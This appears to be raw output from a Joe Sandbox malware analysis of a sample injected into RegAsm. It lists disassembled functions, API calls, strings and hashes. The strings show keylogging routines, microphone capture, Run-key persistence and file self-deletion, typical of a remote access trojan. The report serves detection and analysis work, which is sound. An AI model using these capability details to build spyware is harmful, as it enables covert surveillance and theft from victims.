                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExistsFilePath
                                                                                                                            • String ID: alarm.wav$hYG
                                                                                                                            • API String ID: 1174141254-2782910960
                                                                                                                            • Opcode ID: 18e052de717180e5ab5073ed062dd2c189db3243629e7a025cf8991a71f881ef
                                                                                                                            • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                                                                                                            • Opcode Fuzzy Hash: 18e052de717180e5ab5073ed062dd2c189db3243629e7a025cf8991a71f881ef
                                                                                                                            • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                                                                              • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                                                                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                                                                                                            • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                            • String ID: Online Keylogger Stopped
                                                                                                                            • API String ID: 1623830855-1496645233
                                                                                                                            • Opcode ID: 73b0eeef94ee54ff68d1284e94de7e6f85da7fd3803ffece9138dbe3b9db387d
                                                                                                                            • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                                                                                                            • Opcode Fuzzy Hash: 73b0eeef94ee54ff68d1284e94de7e6f85da7fd3803ffece9138dbe3b9db387d
                                                                                                                            • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                                                                                                            APIs
                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                              • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                            • String ID: Unknown exception
                                                                                                                            • API String ID: 3476068407-410509341
                                                                                                                            • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                            • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                            • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                            • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                            APIs
                                                                                                                            • waveInPrepareHeader.WINMM(008D9000,00000020,?), ref: 00401849
                                                                                                                            • waveInAddBuffer.WINMM(008D9000,00000020), ref: 0040185F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: wave$BufferHeaderPrepare
                                                                                                                            • String ID: XMG
                                                                                                                            • API String ID: 2315374483-813777761
                                                                                                                            • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                                            • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                                                            • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                                            • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                                                            APIs
                                                                                                                            • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LocaleValid
                                                                                                                            • String ID: IsValidLocaleName$JD
                                                                                                                            • API String ID: 1901932003-2234456777
                                                                                                                            • Opcode ID: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                                                                                                                            • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                                                                                                            • Opcode Fuzzy Hash: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                                                                                                                            • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                                                                                                            APIs
                                                                                                                            • GetKeyState.USER32(00000011), ref: 0040B64B
                                                                                                                              • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                                                                                                              • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                                                                                              • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
                                                                                                                              • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                                                                                                              • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                                                                                                              • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
                                                                                                                              • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1
                                                                                                                              • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                            • String ID: [AltL]$[AltR]
                                                                                                                            • API String ID: 2738857842-2658077756
                                                                                                                            • Opcode ID: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
                                                                                                                            • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                                                                                                            • Opcode Fuzzy Hash: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
                                                                                                                            • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                                                                                                            APIs
                                                                                                                            • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                                                                            • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: uD
                                                                                                                            • API String ID: 0-2547262877
                                                                                                                            • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                                                                            • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                                                                                                            • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                                                                            • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                                                                                                            APIs
                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExecuteShell
                                                                                                                            • String ID: !D@$open
                                                                                                                            • API String ID: 587946157-1586967515
                                                                                                                            • Opcode ID: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
                                                                                                                            • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                                                                                                            • Opcode Fuzzy Hash: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
                                                                                                                            • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                                                                                                            APIs
                                                                                                                            • GetKeyState.USER32(00000012), ref: 0040B6A5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: State
                                                                                                                            • String ID: [CtrlL]$[CtrlR]
                                                                                                                            • API String ID: 1649606143-2446555240
                                                                                                                            • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                                                                                                            • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                                                                                                            • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                                                                                                            • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Init_thread_footer__onexit
                                                                                                                            • String ID: ,kG$0kG
                                                                                                                            • API String ID: 1881088180-2015055088
                                                                                                                            • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                                                                                                            • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                                                                                                            • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                                                                                                            • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteOpenValue
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                            • API String ID: 2654517830-1051519024
                                                                                                                            • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                            • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                                                                                                            • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                            • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                                                                                                            APIs
                                                                                                                            • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteDirectoryFileRemove
                                                                                                                            • String ID: pth_unenc
                                                                                                                            • API String ID: 3325800564-4028850238
                                                                                                                            • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                                                                                            • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                                                                                                            • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                                                                                            • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                                                                                                            APIs
                                                                                                                            • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                                                                            • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ObjectProcessSingleTerminateWait
                                                                                                                            • String ID: pth_unenc
                                                                                                                            • API String ID: 1872346434-4028850238
                                                                                                                            • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                                                                                            • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                                                                                                            • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                                                                                            • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                                                                                                            APIs
                                                                                                                            • GetLastInputInfo.USER32(NG), ref: 0041BAF6
                                                                                                                            • GetTickCount.KERNEL32(?,?,?,00415BA3), ref: 0041BAFC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CountInfoInputLastTick
                                                                                                                            • String ID: NG
                                                                                                                            • API String ID: 3478931382-1651712548
                                                                                                                            • Opcode ID: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                                                                                            • Instruction ID: 91b37e9d9b7f8f393223e5bf0be67cbbeb1ccf95644ad96dbec1e326022f3834
                                                                                                                            • Opcode Fuzzy Hash: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                                                                                            • Instruction Fuzzy Hash: 84D0C97180060CABDB04AFA5EC4D99DBBBCEB05212F1042A5E84992210DA71AA548A95
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                                                                                                            • GetLastError.KERNEL32 ref: 00440D35
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1717984340-0
                                                                                                                            • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                                                                                            • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                                                                                                            • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                                                                                            • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                                                                                                            APIs
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411B8C
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C58
                                                                                                                            • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                                                                                                            • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4100373531-0
                                                                                                                            • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                                                                            • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                                                                                                            • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                                                                            • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:5.4%
                                                                                                                            Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:1990
                                                                                                                            Total number of Limit Nodes:56
                                                                                                                            execution_graph 37716 4466f4 37735 446904 37716->37735 37718 446700 GetModuleHandleA 37721 446710 __set_app_type __p__fmode __p__commode 37718->37721 37720 4467a4 37722 4467ac __setusermatherr 37720->37722 37723 4467b8 37720->37723 37721->37720 37722->37723 37736 4468f0 _controlfp 37723->37736 37725 4467bd _initterm GetEnvironmentStringsW _initterm 37726 44681e GetStartupInfoW 37725->37726 37727 446810 37725->37727 37729 446866 GetModuleHandleA 37726->37729 37737 41276d 37729->37737 37733 446896 exit 37734 44689d _cexit 37733->37734 37734->37727 37735->37718 37736->37725 37738 41277d 37737->37738 37780 4044a4 LoadLibraryW 37738->37780 37740 412785 37741 412789 37740->37741 37786 414b81 37740->37786 37741->37733 37741->37734 37744 4127c8 37790 412465 memset ??2@YAPAXI 37744->37790 37746 4127ea 37802 40ac21 37746->37802 37751 412813 37820 40dd07 memset 37751->37820 37752 412827 37825 40db69 memset 37752->37825 37755 412822 37847 4125b6 ??3@YAXPAX DeleteObject 37755->37847 37757 40ada2 _wcsicmp 37758 41283d 37757->37758 37758->37755 37761 412863 CoInitialize 37758->37761 37830 41268e 37758->37830 37760 412966 37848 40b1ab free free 37760->37848 37846 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37761->37846 37765 41296f 37849 40b633 37765->37849 37767 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37772 412957 CoUninitialize 37767->37772 37777 4128ca 37767->37777 37772->37755 37773 4128d0 TranslateAcceleratorW 37774 412941 GetMessageW 37773->37774 37773->37777 37774->37772 37774->37773 37775 412909 IsDialogMessageW 37775->37774 37775->37777 37776 4128fd IsDialogMessageW 37776->37774 37776->37775 37777->37773 37777->37775 37777->37776 37778 41292b TranslateMessage DispatchMessageW 37777->37778 37779 41291f IsDialogMessageW 37777->37779 37778->37774 37779->37774 37779->37778 37781 4044f3 37780->37781 37785 4044cf FreeLibrary 37780->37785 37783 404507 MessageBoxW 37781->37783 37784 40451e 37781->37784 37783->37740 37784->37740 37785->37781 37787 414b8a 37786->37787 37788 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37786->37788 37853 40a804 memset 37787->37853 37788->37744 37791 4124e0 37790->37791 37792 412505 ??2@YAPAXI 37791->37792 37793 41251c 37792->37793 37798 412521 37792->37798 37875 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37793->37875 37864 444722 37798->37864 37801 41259b wcscpy 37801->37746 37880 40b1ab free free 37802->37880 37806 40ad4b 37815 40ad76 37806->37815 37904 40a9ce 37806->37904 37807 40a9ce malloc memcpy free free 37808 40ac5c 37807->37808 37808->37806 37808->37807 37810 40ace7 free 37808->37810 37808->37815 37884 40a8d0 37808->37884 37896 4099f4 37808->37896 37810->37808 37814 40a8d0 7 API calls 37814->37815 37881 40aa04 37815->37881 37816 40ada2 37817 40adaa 37816->37817 37818 40adc9 37816->37818 37817->37818 37819 40adb3 _wcsicmp 37817->37819 37818->37751 37818->37752 37819->37817 37819->37818 37909 40dce0 37820->37909 37822 40dd3a GetModuleHandleW 37914 40dba7 37822->37914 37826 40dce0 3 API calls 37825->37826 37827 40db99 37826->37827 37986 40dae1 37827->37986 38000 402f3a 37830->38000 37832 412766 37832->37755 37832->37761 37833 4126d3 _wcsicmp 37834 4126a8 37833->37834 37834->37832 37834->37833 37836 41270a 37834->37836 38034 4125f8 7 API calls 37834->38034 37836->37832 38003 411ac5 37836->38003 37846->37767 37847->37760 37848->37765 37850 40b640 37849->37850 37851 40b639 free 37849->37851 37852 40b1ab free free 37850->37852 37851->37850 37852->37741 37854 40a83b GetSystemDirectoryW 37853->37854 37855 40a84c wcscpy 37853->37855 37854->37855 37860 409719 wcslen 37855->37860 37858 40a881 LoadLibraryW 37859 40a886 37858->37859 37859->37788 37861 409724 37860->37861 37862 409739 wcscat LoadLibraryW 37860->37862 37861->37862 37863 40972c wcscat 37861->37863 37862->37858 37862->37859 37863->37862 37865 444732 37864->37865 37866 444728 DeleteObject 37864->37866 37876 409cc3 37865->37876 37866->37865 37868 412551 37869 4010f9 37868->37869 37870 401130 37869->37870 37871 401134 GetModuleHandleW LoadIconW 37870->37871 37872 401107 wcsncat 37870->37872 37873 40a7be 37871->37873 37872->37870 37874 40a7d2 37873->37874 37874->37801 37874->37874 37875->37798 37879 409bfd memset wcscpy 37876->37879 37878 409cdb CreateFontIndirectW 37878->37868 37879->37878 37880->37808 37882 40aa14 37881->37882 37883 40aa0a free 37881->37883 37882->37816 37883->37882 37885 40a8eb 37884->37885 37886 40a8df wcslen 37884->37886 37887 40a906 free 37885->37887 37888 40a90f 37885->37888 37886->37885 37892 40a919 37887->37892 37889 4099f4 3 API calls 37888->37889 37889->37892 37890 40a932 37894 4099f4 3 API calls 37890->37894 37891 40a929 free 37893 40a93e memcpy 37891->37893 37892->37890 37892->37891 37893->37808 37895 40a93d 37894->37895 37895->37893 37897 409a41 37896->37897 37898 4099fb malloc 37896->37898 37897->37808 37900 409a37 37898->37900 37901 409a1c 37898->37901 37900->37808 37902 409a30 free 37901->37902 37903 409a20 memcpy 37901->37903 37902->37900 37903->37902 37905 40a9e7 37904->37905 37906 40a9dc free 37904->37906 37908 4099f4 3 API calls 